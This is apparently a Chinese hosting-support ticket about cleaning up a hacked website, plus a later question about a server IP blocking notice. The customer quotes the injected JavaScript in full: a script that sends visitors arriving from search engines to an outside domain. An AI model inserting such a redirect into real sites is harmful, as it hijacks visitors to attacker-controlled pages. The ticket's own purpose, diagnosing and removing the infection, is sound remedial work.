问:请技术工号为:8298 的技术员协助处理问题;
index.html的文件我看是2019.3.28 11.25 生成的
,上次处理后发现还是有问题
问:http://www.xasme.cn/public/static/xasme/js/header.js 发现被加的js代码:在最下面
document.writeln(\”<script LANGUAGE=\\\”Javascript\\\”>\”); document.writeln(\”var s=document.referrer\”); document.writeln(\”if(s.indexOf(\\\”baidu\\\”)>0 || s.indexOf(\\\”sogou\\\”)>0 || s.indexOf(\\\”soso\\\”)>0 ||s.indexOf(\\\”sm\\\”)>0 ||s.indexOf(\\\”uc\\\”)>0 ||s.indexOf(\\\”bing\\\”)>0 ||s.indexOf(\\\”yahoo\\\”)>0 ||s.indexOf(\\\”so\\\”)>0 )\”); document.writeln(\”location.href=\\\”https://2019c2.com\\\”;\”); document.writeln(\”</script>\”);
答:您好,
“public/static/xasme/js/header.js”最后修改时间为3.27 11:04分(之前被挂马的),可能您当时并未更新静态页面,所以没有发现这个问题。根据这个时间点查询日志,锁定木马存在于“/public/static/about/font/index.php”不过这个文件在之前的工单中已经发现并做了清理。再次扫描了您网站,未发现新的挂马,“public/static/xasme/js/header.js”里面的js挂马已经清理,请重新生成您的网站页面,并再观察一下。
“index.html”最后修改时间3.28 11:52 ,锁定日志请求路径为“/public/static/xasme/js/header.js”是同一个问题导致。
,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
问:不是电话沟通过,网站部分视频没办法删除,你们会采取阻断,不会封服务器?怎么又电话说要封?
答:您好,https://www.west.cn/news/list2.asp?newsid=653 看公告是否有您的IP,如果有请马上处理,如果没有应该是误发了。这次是公安部直接下发的有问题服务器IP。
问:你帮我看下。我没时间 就是这个ip
答:??您好,127.0.0.1 没有这个IP地址的通告,不过您也请登录服务器核实有没有被黑、中毒的情况,这次主要针对服务器本身,不是上面的网站。??
问:好的
答:您好,建议参考上面的回复 ,登录主机进一步核实,以避免站点等存在安全隐患 ,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
